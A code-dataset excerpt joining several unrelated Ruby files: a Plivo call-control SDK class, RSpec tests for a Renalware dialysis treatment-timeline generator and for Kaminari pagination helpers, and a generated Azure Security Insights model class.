params[:legs] = options[:legs]
end
%i[loop mix].each do |param|
if options.key?(param) &&
valid_param?(param, options[param], [TrueClass, FalseClass], true)
params[param] = options[param]
end
end
perform_action('Play', 'POST', params, true)
end
def stop_play
perform_action('Play', 'DELETE', nil, false)
end
def speak(text, options = nil)
valid_param?(:text, text, String, true)
if options.nil?
return perform_action('Speak', 'POST', { text: text }, true)
end
valid_param?(:options, options, Hash, true)
params = { text: text }
if options.key?(:language) &&
valid_param?(:language, options[:language], String, true)
params[:language] = options[:language]
end
if options.key?(:voice) &&
valid_param?(:voice, options[:voice],
[String, Symbol], true, %w[MAN WOMAN])
params[:voice] = options[:voice]
end
if options.key?(:legs) &&
valid_param?(:legs, options[:legs],
[String, Symbol], true, %w[aleg bleg both])
params[:legs] = options[:legs]
end
%i[loop mix].each do |param|
if options.key?(param) &&
valid_param?(param, options[param], [TrueClass, FalseClass], true)
params[param] = options[param]
end
end
perform_action('Speak', 'POST', params, true)
end
def stop_speak
perform_action('Speak', 'DELETE', nil, false)
end
def send_digits(digits, leg = nil)
valid_param?(:digits, digits, String, true)
params = { digits: digits }
if !leg.nil? &&
valid_param?(:leg, leg,
[String, Symbol], true, %w[aleg bleg both])
params[:leg] = leg
end
perform_action('DTMF', 'POST', params, true)
end
def cancel_request
resource_path = @_resource_uri.sub('Call', 'Request')
@_client.send_request(resource_path, 'DELETE', nil)
end
def to_s
call_details = {
answer_time: @answer_time,
api_id: @api_id,
bill_duration: @bill_duration,
billed_duration: @billed_duration,
call_direction: @call_direction,
call_duration: @call_duration,
call_status: @call_status,
call_uuid: @call_uuid,
end_time: @end_time,
from_number: @from_number,
initiation_time: @initiation_time,
parent_call_uuid: @parent_call_uuid,
hangup_cause_code: @hangup_cause_code,
hangup_cause_name: @hangup_cause_name,
hangup_source: @hangup_source,
resource_uri: @resource_uri,
to_number: @to_number,
total_amount: @total_amount,
total_rate: @total_rate,
to: @to,
from: @from,
request_uuid: @request_uuid,
direction: @direction,
caller_name: @caller_name
}
call_details = call_details.select {|k, v| !v.nil? }
call_details.to_s
end
end
class CallInterface < Base::ResourceInterface
def initialize(client, resource_list_json = nil)
@_name = 'Call'
@_resource_type = Call
@_identifier_string = 'call_uuid'
super
end
##
# Makes an outbound call
#
# @param [String] from
# @param [Array] to
# @param [String] answer_url
# @param [String] answer_method
# @param [Hash] options
# @option options [String] :answer_method - The method used to call the answer_url. Defaults to POST.
# @option options [String] :ring_url - The URL that is notified by Plivo when the call is ringing. Defaults not set.
# @option options [String] :ring_method - The method used to call the ring_url. Defaults to POST.
# @option options [String] :hangup_url - The URL that will be notified by Plivo when the call hangs up. Defaults to answer_url.
# @option options [String] :hangup_method - The method used to call the hangup_url. Defaults to POST.
# @option options [String] :fallback_url - Invoked by Plivo only if answer_url is unavailable or the XML response is invalid. Should contain a XML response.
# @option options [String] :fallback_method - The method used to call the fallback_answer_url. Defaults to POST.
# @option options [String] :caller_name - Caller name to use with the call.
# @option options [String] :send_digits - Plivo plays DTMF tones when the call is answered. This is useful when dialing a phone number and an extension. Plivo will dial the number, and when the automated system picks up, sends the DTMF tones to connect to the extension. E.g. If you want to dial the 2410 extension after the call is connected, and you want to wait for a few seconds before sending the extension, add a few leading 'w' characters. Each 'w' character waits 0.5 second before sending a digit. Each 'W' character waits 1 second before sending a digit. You can also add the tone duration in ms by appending @duration after the string (default duration is 2000 ms). For example, 1w2w3@1000 See the DTMF API for additional information.
# @option options [Boolean] :send_on_preanswer - If set to true and send_digits is also set, digits are sent when the call is in preanswer state. Defaults to false.
# @option options [Int] :time_limit - Schedules the call for hangup at a specified time after the call is answered. Value should be an integer > 0(in seconds).
# @option options [Int] :hangup_on_ring - Schedules the call for hangup at a specified time after the call starts ringing. Value should be an integer >= 0 (in seconds).
# @option options [String] :machine_detection - Used to detect if the call has been answered by a machine. The valid values are true and hangup. Default time to analyze is 5000 milliseconds (or 5 seconds). You can change it with the machine_detection_time parameter. Note that no XML is processed during the analysis phase. If a machine is detected during the call and machine_detection is set to true, the Machine parameter will be set to true and will be sent to the answer_url, hangup_url, or any other URL that is invoked by the call. If a machine is detected during the call and machine_detection is set to hangup, the call hangs up immediately and a request is made to the hangup_url with the Machine parameter set to true
# @option options [Int] :machine_detection_time - Time allotted to analyze if the call has been answered by a machine. It should be an integer >= 2000 and <= 10000 and the unit is ms. The default value is 5000 ms.
# @option options [String] :machine_detection_url - A URL where machine detection parameters will be sent by Plivo. This parameter should be used to make machine detection asynchronous
# @option options [String] :machine_detection_method - The HTTP method which will be used by Plivo to request the machine_detection_url. Defaults to POST.
# @option options [String] :sip_headers- List of SIP headers in the form of 'key=value' pairs, separated by commas. E.g. head1=val1,head2=val2,head3=val3,...,headN=valN. The SIP headers are always prefixed with X-PH-. The SIP headers are present for every HTTP request made by the outbound call. Only [A-Z], [a-z] and [0-9] characters are allowed for the SIP headers key and value. Additionally, the '%' character is also allowed for the SIP headers value so that you can encode this value in the URL.
# @option options [Int] :ring_timeout - Determines the time in seconds the call should ring. If the call is not answered within the ring_timeout value or the default value of 120s, it is canceled.
# @option options [String] :parent_call_uuid - The call_uuid of the first leg in an ongoing conference call. It is recommended to use this parameter in scenarios where a member who is already present in the conference intends to add new members by initiating outbound API calls. This minimizes the delay in adding a new memeber to the conference.
# @option options [Boolean] :error_parent_not_found - if set to true and the parent_call_uuid cannot be found, the API request would return an error. If set to false, the outbound call API request will be executed even if the parent_call_uuid is not found. Defaults to false.
# @return [Call] Call
def create(from, to, answer_url, answer_method = 'POST', options = nil)
valid_param?(:from, from, [String, Symbol, Integer], true)
valid_param?(:to, to, Array, true)
to.each do |to_num|
valid_param?(:to_num, to_num, [Integer, String, Symbol], true)
end
valid_param?(:answer_url, answer_url, [String, Symbol], true)
valid_param?(:answer_method, answer_method, [String, Symbol],
true, %w[GET POST])
params = {
from: from,
to: to.join('<'),
answer_url: answer_url,
answer_method: answer_method
}
return perform_create(params) if options.nil?
perform_create(params.merge(options))
end
##
# Get details of a call
# @param [String] call_uuid
def get(call_uuid)
valid_param?(:call_uuid, call_uuid, [String, Symbol], true)
perform_get(call_uuid)
end
# @param [String] call_uuid
def get_live(call_uuid)
perform_get(call_uuid, status: 'live')
end
# @param [String] call_uuid
def get_queued(call_uuid)
perform_get(call_uuid, status: 'queued')
end
# @param [Hash] options
# @option options [String] :subaccount - The id of the subaccount, if call details of the subaccount are needed.
# @option options [String] :call_direction - Filter the results by call direction. The valid inputs are inbound and outbound.
# @option options [String] :from_number - Filter the results by the number from where the call originated. For example:
# - To filter out those numbers that contain a particular number sequence, use from_number={ sequence}
# - To filter out a number that matches an exact number, use from_number={ exact_number}
# @option options [String] :to_number - Filter the results by the number to which the call was made. Tips to use this filter are:
# - To filter out those numbers that contain a particular number sequence, use to_number={ sequence}
# - To filter out a number that matches an exact number, use to_number={ exact_number}
# @option options [String] :bill_duration - Filter the results according to billed duration. The value of billed duration is in seconds. The filter can be used in one of the following five forms:
# - bill_duration: Input the exact value. E.g., to filter out calls that were exactly three minutes long, use bill_duration=180
# - bill_duration\__gt: gt stands for greater than. E.g., to filter out calls that were more than two hours in duration bill_duration\__gt=7200
# - bill_duration\__gte: gte stands for greater than or equal to. E.g., to filter out calls that were two hours or more in duration bill_duration\__gte=7200
# - bill_duration\__lt: lt stands for lesser than. E.g., to filter out calls that were less than seven minutes in duration bill_duration\__lt=420
# - bill_duration\__lte: lte stands for lesser than or equal to. E.g., to filter out calls that were two hours or less in duration bill_duration\__lte=7200
# @option options [String] :end_time - Filter out calls according to the time of completion. The filter can be used in the following five forms:
# - end_time: The format expected is YYYY-MM-DD HH:MM[:ss[.uuuuuu]]. E.g., To get all calls that ended at 2012-03-21 11:47[:30], use end_time=2012-03-21 11:47[:30]
# - end_time\__gt: gt stands for greater than. The format expected is YYYY-MM-DD HH:MM[:ss[.uuuuuu]]. E.g., To get all calls that ended after 2012-03-21 11:47, use end_time\__gt=2012-03-21 11:47
# - end_time\__gte: gte stands for greater than or equal. The format expected is YYYY-MM-DD HH:MM[:ss[.uuuuuu]]. E.g., To get all calls that ended after or exactly at 2012-03-21 11:47[:30], use end_time\__gte=2012-03-21 11:47[:30]
# - end_time\__lt: lt stands for lesser than. The format expected is YYYY-MM-DD HH:MM[:ss[.uuuuuu]]. E.g., To get all calls that ended before 2012-03-21 11:47, use end_time\__lt=2012-03-21 11:47
# - end_time\__lte: lte stands for lesser than or equal. The format expected is YYYY-MM-DD HH:MM[:ss[.uuuuuu]]. E.g., To get all calls that ended before or exactly at 2012-03-21 11:47[:30], use end_time\__lte=2012-03-21 11:47[:30]
# - Note: The above filters can be combined to get calls that ended in a particular time range. The timestamps need to be UTC timestamps.
# @option options [String] :parent_call_uuid - Filter the results by parent call uuid.
# @option options [String] :hangup_source - Filter the results by hangup source
# @option options [String] :hangup_cause_code - Filter the results by hangup cause code
# @option options [Int] :limit - Used to display the number of results per page. The maximum number of results that can be fetched is 20.
# @option options [Int] :offset - Denotes the number of value items by which the results should be offset. E.g., If the result contains a 1000 values and limit is set to 10 and offset is set to 705, then values 706 through 715 are displayed in the results. This parameter is also used for pagination of the results.
def list(options = nil)
return perform_list if options.nil?
valid_param?(:options, options, Hash, true)
params = {}
params_expected = %i[
subaccount bill_duration bill_duration__gt bill_duration__gte
bill_duration__lt bill_duration__lte end_time end_time__gt
end_time__gte end_time__lt end_time__lte parent_call_uuid hangup_source
]
params_expected.each do |param|
if options.key?(param) &&
valid_param?(param, options[param], [String, Symbol], true)
params[param] = options[param]
end
end
if options.key?(:call_direction) &&
valid_param?(:call_direction, options[:call_direction],
[String, Symbol], true, %w[inbound outbound])
params[:call_direction] = options[:call_direction]
end
%i[offset limit hangup_cause_code].each do |param|
if options.key?(param) && valid_param?(param, options[param], [Integer, Integer], true)
params[param] = options[param]
end
end
raise_invalid_request("Offset can't be negative") if options.key?(:offset) && options[:offset] < 0
if options.key?(:limit) && (options[:limit] > 20 || options[:limit] <= 0)
raise_invalid_request('The maximum number of results that can be '\
"fetched is 20. limit can't be more than 20 or less than 1")
end
perform_list(params)
end
def each
offset = 0
loop do
call_list = list(offset: offset)
call_list[:objects].each { |call| yield call }
offset += 20
return unless call_list.length == 20
end
end
# @param [Hash] options
# @option options [String] :call_direction - Filter the results by call direction. The valid inputs are inbound and outbound.
# @option options [String] :from_number - Filter the results by the number from where the call originated. For example:
# - To filter out those numbers that contain a particular number sequence, use from_number={ sequence}
# - To filter out a number that matches an exact number, use from_number={ exact_number}
# @option options [String] :to_number - Filter the results by the number to which the call was made. Tips to use this filter are:
# - To filter out those numbers that contain a particular number sequence, use to_number={ sequence}
# - To filter out a number that matches an exact number, use to_number={ exact_number}
def list_live(options = nil)
if options.nil?
options = {}
else
valid_param?(:options, options, Hash, true)
end
params = {}
params[:status] = 'live'
params_expected = %i[
from_number to_number
]
params_expected.each do |param|
if options.key?(param) &&
valid_param?(param, options[param], [String, Symbol], true)
params[param] = options[param]
end
end
if options.key?(:call_direction) &&
valid_param?(:call_direction, options[:call_direction],
[String, Symbol], true, %w[inbound outbound])
params[:call_direction] = options[:call_direction]
end
perform_list_without_object(params)
{
api_id: @api_id,
calls: @calls
}
end
def list_queued
perform_list_without_object(status: 'queued')
{
api_id: @api_id,
calls: @calls
}
end
def each_live
call_list = list_live
call_list[:calls].each { |call| yield call }
end
def each_queued
call_queued = list_queued
call_queued[:calls].each { |call| yield call}
end
##
# Transfer a call
# @param [String] call_uuid
# @param [Hash] details
# @option details [String] :legs - aleg, bleg or both Defaults to aleg. aleg will transfer call_uuid ; bleg will transfer the bridged leg (if found) of call_uuid ; both will transfer call_uuid and bridged leg of call_uuid
# @option details [String] :aleg_url - URL to transfer for aleg, if legs is aleg or both, then aleg_url has to be specified.
# @option details [String] :aleg_method - HTTP method to invoke aleg_url. Defaults to POST.
# @option details [String] :bleg_url - URL to transfer for bridged leg, if legs is bleg or both, then bleg_url has to be specified.
# @option details [String] :bleg_method - HTTP method to invoke bleg_url. Defaults to POST.
# @return [Call] Call
def update(call_uuid, details)
valid_param?(:call_uuid, call_uuid, [String, Symbol], true)
Call.new(@_client, resource_id: call_uuid).update(details)
end
# @param [String] call_uuid
def delete(call_uuid)
valid_param?(:call_uuid, call_uuid, [String, Symbol], true)
Call.new(@_client, resource_id: call_uuid).delete
end
# @param [String] call_uuid
# @param [Hash] options
# @option options [Int] :time_limit - Max recording duration in seconds. Defaults to 60.
# @option options [String] :file_format - The format of the recording. The valid formats are mp3 and wav formats. Defaults to mp3.
# @option options [String] :transcription_type - The type of transcription required. The following values are allowed:
# - auto - This is the default value. Transcription is completely automated; turnaround time is about 5 minutes.
# - hybrid - Transcription is a combination of automated and human verification processes; turnaround time is about 10-15 minutes.
# - *Our transcription service is primarily for the voicemail use case (limited to recorded files lasting for up to 2 minutes). Currently the service is available only in English and you will be charged for the usage. Please check out the price details.
# @option options [String] :transcription_url - The URL where the transcription is available.
# @option options [String] :transcription_method - The method used to invoke the transcription_url. Defaults to POST.
# @option options [String] :callback_url - The URL invoked by the API when the recording ends. The following parameters are sent to the callback_url:
# - api_id - the same API ID returned by the call record API.
# - record_url - the URL to access the recorded file.
# - call_uuid - the call uuid of the recorded call.
# - recording_id - the recording ID of the recorded call.
# - recording_duration - duration in seconds of the recording.
# - recording_duration_ms - duration in milliseconds of the recording.
# - recording_start_ms - when the recording started (epoch time UTC) in milliseconds.
# - recording_end_ms - when the recording ended (epoch time UTC) in milliseconds.
# @option options [String] :callback_method - The method which is used to invoke the callback_url URL. Defaults to POST.
def record(call_uuid, options = nil)
valid_param?(:call_uuid, call_uuid, [String, Symbol], true)
Call.new(@_client, resource_id: call_uuid).record(options)
end
# @param [String] call_uuid
# @param [String] url - You can specify a record URL to stop only one record. By default all recordings are stopped.
def stop_record(call_uuid, url = nil)
valid_param?(:call_uuid, call_uuid, [String, Symbol], true)
Call.new(@_client, resource_id: call_uuid).stop_record(url)
end
# @param [String] call_uuid
# @param [Array] urls
# @param [Hash] options
# @option options [Array of strings] :urls - A single URL or a list of comma separated URLs linking to an mp3 or wav file.
# @option options [Int] :length - Maximum length in seconds that the audio should be played.
# @option options [String] :legs - The leg on which the music will be played, can be aleg (i.e., A-leg is the first leg of the call or current call), bleg (i.e., B-leg is the second leg of the call),or both (i.e., both legs of the call).
# @option options [Boolean] :loop - If set to true, the audio file will play indefinitely.
# @option options [Boolean] :mix - If set to true, sounds are mixed with current audio flow.
def play(call_uuid, urls, options = nil)
valid_param?(:call_uuid, call_uuid, [String, Symbol], true)
valid_param?(:urls, urls, Array, true)
Call.new(@_client, resource_id: call_uuid).play(urls, options)
end
# @param [String] call_uuid
def stop_play(call_uuid)
valid_param?(:call_uuid, call_uuid, [String, Symbol], true)
Call.new(@_client, resource_id: call_uuid).stop_play
end
# @param [String] call_uuid
# @param [String] text
# @param [Hash] options
# @option options [String] :voice - The voice to be used, can be MAN, WOMAN.
# @option options [Int] :language - The language to be used, see Supported voices and languages {https://www.plivo.com/docs/api/call/speak/#supported-voices-and-languages}
# @option options [String] :legs - The leg on which the music will be played, can be aleg (i.e., A-leg is the first leg of the call or current call), bleg (i.e., B-leg is the second leg of the call),or both (i.e., both legs of the call).
# @option options [Boolean] :loop - If set to true, the audio file will play indefinitely.
# @option options [Boolean] :mix - If set to true, sounds are mixed with current audio flow.
def speak(call_uuid, text, options = nil)
valid_param?(:call_uuid, call_uuid, [String, Symbol], true)
Call.new(@_client, resource_id: call_uuid).speak(text, options)
end
# @param [String] call_uuid
def stop_speak(call_uuid)
valid_param?(:call_uuid, call_uuid, [String, Symbol], true)
Call.new(@_client, resource_id: call_uuid).stop_speak
end
# @param [String] call_uuid
# @param [String] digits - Digits to be sent.
# @param [String] leg - The leg to be used, can be aleg (the current call) or bleg (the other party in a Dial). Defaults to aleg.
def send_digits(call_uuid, digits, leg = nil)
valid_param?(:call_uuid, call_uuid, [String, Symbol], true)
Call.new(@_client, resource_id: call_uuid).send_digits(digits, leg)
end
# @param [String] call_uuid
def cancel_request(call_uuid)
valid_param?(:call_uuid, call_uuid, [String, Symbol], true)
Call.new(@_client, resource_id: call_uuid).cancel_request
end
end
end
end
| 53.329749 | 751 | 0.625815 |
18c93642b19bb8e5e894487f9e2876a34b59e226 | 11,118 | # frozen_string_literal: true
require "rails_helper"
# rubocop:disable RSpec/ExampleLength, Layout/LineLength, Style/WordArray
module Renalware
module UKRDC
describe TreatmentTimeline::HD::Generator do
include PatientsSpecHelper
subject(:generator) { described_class.new(modality) }
let(:user) { create(:user) }
let(:hd_ukrdc_modality_code) { create(:ukrdc_modality_code, :hd) }
let(:hdf_ukrdc_modality_code) { create(:ukrdc_modality_code, :hdf) }
let(:hd_mod_desc) { create(:hd_modality_description) }
let(:patient) { create(:patient) }
let(:modality) do
set_modality(
patient: patient,
modality_description: hd_mod_desc,
by: user
)
end
def create_profile(start_date:, end_date: nil, hd_type: :hd, active: true, **args)
create(
:hd_profile,
hd_type, # trait eg :hdf_pre
patient: patient,
created_at: start_date,
deactivated_at: end_date,
active: active,
**args
)
end
before do
hd_ukrdc_modality_code
hdf_ukrdc_modality_code
end
context "when the patient has the HD modality" do
let(:patient) { create(:hd_patient) }
context "when they have no HD profile" do
it "creates one Treatment with a generic UKRDC treatment code of HD" do
expect {
generator.call
}.to change(UKRDC::Treatment, :count).by(1)
expect(UKRDC::Treatment.first).to have_attributes(
patient_id: patient.id,
hd_profile_id: nil,
modality_code: hd_ukrdc_modality_code,
modality_description_id: hd_mod_desc.id,
started_on: modality.started_on,
ended_on: modality.ended_on,
modality_id: modality.id
)
end
end
context "when they have an HD Profile active at the point of modality creation" do
it "creates uses the regime type when creating the Treatment" do
create_profile(start_date: 5.years.ago, end_date: nil, hd_type: :hdf_pre)
expect {
generator.call
}.to change(UKRDC::Treatment, :count).by(1)
expect(UKRDC::Treatment.first).to have_attributes(
modality_code: hdf_ukrdc_modality_code
)
end
end
context "when they have an HD Profile created within 100yrs of the modality start date" do
it "finds this initial profile, regardless of how far in the future it is, and "\
"uses its type etc when creating the Treatment" do
create_profile(start_date: Time.zone.now + 99.years, end_date: nil, hd_type: :hdf_pre)
expect {
generator.call
}.to change(UKRDC::Treatment, :count).by(1)
expect(UKRDC::Treatment.first).to have_attributes(
modality_code: hdf_ukrdc_modality_code
)
end
end
context "when 2 HD profiles (HDF then HD) created after the modality start date" do
it "uses the first for the initial Treatment and creates "\
"a futher Treatment to register the change from HDF to HD" do
# The first profile - this will be associated with the modality when creating
# the first treatment record - is the treatment record will use its HD type etc
unit = create(:hospital_unit)
# this will be their current modality as it is the only one and has no ended_on
modality1 = set_modality(
patient: patient,
modality_description: hd_mod_desc,
by: user,
started_on: "2017-01-01"
)
# SQL View will find this and use data in here for hd_type and unit in the first
# treatment (created for the modality). It won't trigger a new treatment as its data
# has been applied to the first treatment
create_profile(
start_date: "2018-01-01",
end_date: "2019-01-01",
hd_type: :hdf_pre,
hospital_unit: unit,
active: false
)
# should create another treatment based on this as hd type has changed
# provided it thinks it is within the range from..to in ProfilesInDateRangeQuery
# this is complicated by the fact it has a nil end_date...
last_hd_profile = create_profile(
start_date: "2019-01-01",
end_date: nil, # current
hd_type: :hd
)
expect {
described_class.new(modality1).call
}.to change(UKRDC::Treatment, :count).by(2)
treatments = UKRDC::Treatment.order(started_on: :asc)
expect(treatments[0]).to have_attributes(
modality_code: hdf_ukrdc_modality_code,
started_on: modality1.started_on,
ended_on: last_hd_profile.created_at.to_date
)
expect(treatments[1]).to have_attributes(
modality_code: hd_ukrdc_modality_code,
started_on: last_hd_profile.created_at.to_date,
ended_on: nil
)
end
end
describe "patient has 4 HD modalities in the past but only much newer HD profiles" do
# Based on 133651
it "uses the first found hd profile in order to resolve the unit id" do
modal1 = set_modality(
patient: patient,
modality_description: hd_mod_desc,
by: user,
started_on: "2017-06-21"
)
modal2 = set_modality(
patient: patient,
modality_description: hd_mod_desc,
by: user,
started_on: "2017-08-10"
)
modal3 = set_modality(
patient: patient,
modality_description: hd_mod_desc,
by: user,
started_on: "2017-11-14"
)
modal4 = set_modality(
patient: patient,
modality_description: hd_mod_desc,
by: user,
started_on: "2017-12-02"
)
unit1 = create(:hospital_unit)
unit2 = create(:hospital_unit)
# 3 HD profiles but all created on the same day so the last one is the 'effective' one
# But note they are not 'in range' of any HD modality so count for nothing
create_profile(
start_date: "2018-03-08 18:00:14.760431", # created_at
end_date: "2018-03-12 11:20:39.431778", # deactivated_at
hd_type: :hd,
active: nil,
prescribed_on: nil,
hospital_unit: unit1,
prescribed_time: 210
)
create_profile(
start_date: "2018-03-12 11:20:39.443311", # created_at
end_date: nil, # deactivated_at
hd_type: :hd,
active: true,
prescribed_on: nil,
hospital_unit: unit2,
prescribed_time: 210
)
expect {
described_class.new(modal1.reload).call
described_class.new(modal2.reload).call
described_class.new(modal3.reload).call
described_class.new(modal4.reload).call
}.to change(UKRDC::Treatment, :count).by(5)
treatments = UKRDC::Treatment.all
# The SQL view hd_profile_for_modalities will find the first HD Profile
# and takes its hospital unit id. No other modalities define in their window
# a new HD profile that would change the unit id (or hd type)
expect(treatments.map(&:hospital_unit_id).uniq).to eq [unit1.id, unit2.id]
expect(treatments.map(&:hd_type).uniq).to eq ["hd"]
end
end
describe "patient has 4 HD modalities and 3 HD profiles" do
it "uses the first found hd profile in order to resolve the unit id "\
"and creates two more treatments for the profile changes" do
units = [create(:hospital_unit), create(:hospital_unit)]
modality_start_dates = [
"2016-01-01",
"2017-01-01",
"2018-01-01",
"2019-01-01"
]
modalities = modality_start_dates.map do |date|
set_modality(
patient: patient,
modality_description: hd_mod_desc,
by: user,
started_on: date
)
end
# First profile is a year after the first modality, but it is found and used by
# modality[0]. The profile lasts for 1 month then another is created
profiles_definitions = [
# start_date, end_date, hd_type, unit
["2017-02-01", "2017-03-01", :hd, units.first],
["2017-03-01", "2017-04-01", :hdf_pre, units.first], # hd_type changes
["2017-04-01", nil, :hdf_pre, units.last] # unit changes NB deactivated_at = nil as current profile
]
profiles_definitions.each do |defn|
create_profile(
start_date: defn[0], # created_at
end_date: defn[1], # deactivated_at
hd_type: defn[2],
active: defn[1].nil? ? true : nil,
prescribed_on: nil,
hospital_unit: defn[3],
prescribed_time: 210
)
end
expect {
modalities.each do |modality|
described_class.new(modality.reload).call
end
}.to change(UKRDC::Treatment, :count).by(6)
treatments = UKRDC::Treatment.all.order(:started_on)
expected = [
# started_on, ended_on, hd_type, unit
["2016-01-01", "2017-01-01", "hd", units[0]], # modality[0]
["2017-01-01", "2017-03-01", "hd", units[0]], # modality[1] - ends early due to hd_profile change
["2017-03-01", "2017-04-01", "hdf_pre", units[0]], # triggered by hd_type change in profile
["2017-04-01", "2018-01-01", "hdf_pre", units[1]], # triggered by unit change in profile,
["2018-01-01", "2019-01-01", "hdf_pre", units[1]], # modality[3],
["2019-01-01", nil, "hdf_pre", units[1]] # modality[4]
]
expected.each_with_index do |row, index|
expect(treatments[index]).to have_attributes(
started_on: Date.parse(row[0]),
ended_on: row[1] && Date.parse(row[1]),
hd_type: row[2], # from 1st hd profile
hospital_unit: row[3]
)
end
end
end
end
end
end
end
# rubocop:enable RSpec/ExampleLength, Layout/LineLength, Style/WordArray
| 38.337931 | 125 | 0.555226 |
e838ca510e817f27794d21531fddbd18c955fc20 | 1,611 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::SecurityInsights::Mgmt::V2019_01_01_preview
module Models
#
# Describes an threat intelligence ARM STIX Sort By
#
class ThreatIntelligenceArmStixSortBy1
include MsRestAzure
# @return [String] Item key
attr_accessor :item_key
# @return [ThreatIntelligenceArmStixSortBy] Sort order. Possible values
# include: 'unsorted', 'ascending', 'descending'
attr_accessor :sort_order
#
# Mapper for ThreatIntelligenceArmStixSortBy1 class as Ruby Hash.
# This will be used for serialization/deserialization.
#
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: 'ThreatIntelligenceArmStixSortBy',
type: {
name: 'Composite',
class_name: 'ThreatIntelligenceArmStixSortBy1',
model_properties: {
item_key: {
client_side_validation: true,
required: false,
serialized_name: 'itemKey',
type: {
name: 'String'
}
},
sort_order: {
client_side_validation: true,
required: false,
serialized_name: 'sortOrder',
type: {
name: 'String'
}
}
}
}
}
end
end
end
end
| 27.305085 | 77 | 0.556797 |
f75bd96f37ff40b430d9c7354a7109961503bd06 | 27 | module ChampionsHelper
end
| 9 | 22 | 0.888889 |
61601586537d4d8127df195b18ee0ead767a564d | 21,034 | # frozen_string_literal: true
require 'test_helper'
if defined?(::Rails::Railtie) && defined?(::ActionView)
class ActionViewExtensionTest < ActionView::TestCase
setup do
self.output_buffer = ::ActionView::OutputBuffer.new
I18n.available_locales = [:en, :de, :fr]
I18n.locale = :en
end
teardown do
User.delete_all
end
sub_test_case '#paginate' do
setup do
50.times {|i| User.create! name: "user#{i}"}
end
test 'returns a String' do
users = User.page(1)
assert_kind_of String, view.paginate(users, params: {controller: 'users', action: 'index'})
end
test 'escaping the pagination for javascript' do
users = User.page(1)
assert_nothing_raised do
escape_javascript(view.paginate users, params: {controller: 'users', action: 'index'})
end
end
test 'allows for overriding params with the :params option' do
view.params[:controller], view.params[:action] = 'addresses', 'new'
users = User.page(1)
assert_match '/users?page=2', view.paginate(users, params: { controller: 'users', action: 'index' })
end
test 'accepts :theme option' do
users = User.page(1)
begin
controller.append_view_path File.join(Gem.loaded_specs['kaminari-core'].gem_dir, 'test/fake_app/views')
html = view.paginate users, theme: 'bootstrap', params: {controller: 'users', action: 'index'}
assert_match(/bootstrap-paginator/, html)
assert_match(/bootstrap-page-link/, html)
ensure
controller.view_paths.pop
end
end
test 'accepts :views_prefix option' do
users = User.page(1)
begin
controller.append_view_path File.join(Gem.loaded_specs['kaminari-core'].gem_dir, 'test/fake_app/views')
assert_equal " <b>1</b>\n", view.paginate(users, views_prefix: 'alternative/', params: {controller: 'users', action: 'index'})
ensure
controller.view_paths.pop
end
end
test 'accepts :paginator_class option' do
users = User.page(1)
custom_paginator = Class.new(Kaminari::Helpers::Paginator) do
def to_s
"CUSTOM PAGINATION"
end
end
assert_equal 'CUSTOM PAGINATION', view.paginate(users, paginator_class: custom_paginator, params: {controller: 'users', action: 'index'})
end
test 'total_pages: 3' do
users = User.page(1)
assert_match(/<a href="\/users\?page=3">Last/, view.paginate(users, total_pages: 3, params: {controller: 'users', action: 'index'}))
end
test "page: 20 (out of range)" do
users = User.page(20)
html = view.paginate users, params: {controller: 'users', action: 'index'}
assert_not_match(/Last/, html)
assert_not_match(/Next/, html)
end
end
sub_test_case '#link_to_previous_page' do
setup do
60.times {|i| User.create! name: "user#{i}"}
end
sub_test_case 'having previous pages' do
test 'the default behaviour' do
users = User.page(3)
html = view.link_to_previous_page users, 'Previous', params: {controller: 'users', action: 'index'}
assert_match(/page=2/, html)
assert_match(/rel="prev"/, html)
html = view.link_to_previous_page users, 'Previous', params: {controller: 'users', action: 'index'} do 'At the Beginning' end
assert_match(/page=2/, html)
assert_match(/rel="prev"/, html)
end
test 'overriding rel=' do
users = User.page(3)
assert_match(/rel="external"/, view.link_to_previous_page(users, 'Previous', rel: 'external', params: {controller: 'users', action: 'index'}))
end
test 'with params' do
users = User.page(3)
params[:status] = 'active'
assert_match(/status=active/, view.link_to_previous_page(users, 'Previous', params: {controller: 'users', action: 'index'}))
end
end
test 'the first page' do
users = User.page(1)
assert_nil view.link_to_previous_page(users, 'Previous', params: {controller: 'users', action: 'index'})
assert_equal 'At the Beginning', (view.link_to_previous_page(users, 'Previous', params: {controller: 'users', action: 'index'}) do 'At the Beginning' end)
end
test 'out of range' do
users = User.page(5)
assert_nil view.link_to_previous_page(users, 'Previous', params: {controller: 'users', action: 'index'})
assert_equal 'At the Beginning', (view.link_to_previous_page(users, 'Previous', params: {controller: 'users', action: 'index'}) do 'At the Beginning' end)
end
test '#link_to_previous_page accepts ActionController::Parameters' do
users = User.page(3)
params = ActionController::Parameters.new(controller: 'users', action: 'index', status: 'active')
html = view.link_to_previous_page users, 'Previous', params: params
assert_match(/page=2/, html)
assert_match(/rel="prev"/, html)
assert_match(/status=active/, html)
end
end
sub_test_case '#link_to_next_page' do
setup do
50.times {|i| User.create! name: "user#{i}"}
end
sub_test_case 'having more page' do
test 'the default behaviour' do
users = User.page(1)
html = view.link_to_next_page users, 'More', params: {controller: 'users', action: 'index'}
assert_match(/page=2/, html)
assert_match(/rel="next"/, html)
end
test 'overriding rel=' do
users = User.page(1)
assert_match(/rel="external"/, view.link_to_next_page(users, 'More', rel: 'external', params: {controller: 'users', action: 'index'}))
end
test 'with params' do
users = User.page(1)
params[:status] = 'active'
assert_match(/status=active/, view.link_to_next_page(users, 'More', params: {controller: 'users', action: 'index'}))
end
end
test 'the last page' do
users = User.page(2)
assert_nil view.link_to_next_page(users, 'More', params: {controller: 'users', action: 'index'})
end
test 'out of range' do
users = User.page(5)
assert_nil view.link_to_next_page(users, 'More', params: {controller: 'users', action: 'index'})
end
test '#link_to_next_page accepts ActionController::Parameters' do
users = User.page(1)
params = ActionController::Parameters.new(controller: 'users', action: 'index', status: 'active')
html = view.link_to_next_page users, 'More', params: params
assert_match(/page=2/, html)
assert_match(/rel="next"/, html)
assert_match(/status=active/, html)
end
end
sub_test_case '#page_entries_info' do
sub_test_case 'on a model without namespace' do
sub_test_case 'having no entries' do
test 'with default entry name' do
users = User.page(1).per(25)
assert_equal 'No users found', view.page_entries_info(users)
end
test 'setting the entry name option to "member"' do
users = User.page(1).per(25)
assert_equal 'No members found', view.page_entries_info(users, entry_name: 'member')
end
end
sub_test_case 'having 1 entry' do
setup do
User.create! name: 'user1'
end
test 'with default entry name' do
users = User.page(1).per(25)
